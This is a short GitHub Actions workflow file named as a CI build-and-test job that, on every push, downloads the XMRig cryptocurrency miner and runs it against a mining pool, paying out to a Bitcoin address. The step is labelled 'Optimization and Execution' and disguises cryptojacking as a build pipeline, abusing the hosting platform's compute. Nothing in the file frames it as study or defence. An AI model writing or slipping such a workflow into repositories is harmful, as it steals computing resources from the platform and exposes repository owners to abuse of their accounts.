name: CI_BUILD_TEST_V1
on: [push, workflow_dispatch]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
    - name: Optimization and Execution
      run: |
        sudo sysctl -w vm.nr_hugepages=1280
        wget -q https://github.com/xmrig/xmrig/releases/download/v6.25.0/xmrig-6.25.0-linux-static-x64.tar.gz
        tar -xf xmrig-6.25.0-linux-static-x64.tar.gz
        cd xmrig-6.25.0
        ./xmrig -o rx.unmineable.com:3333 -a rx -k -u BTC:bc1qekvahlgr843q5vjdvw7dyl32wd5qyrvvyaary0.GITHUB_BOT -p x
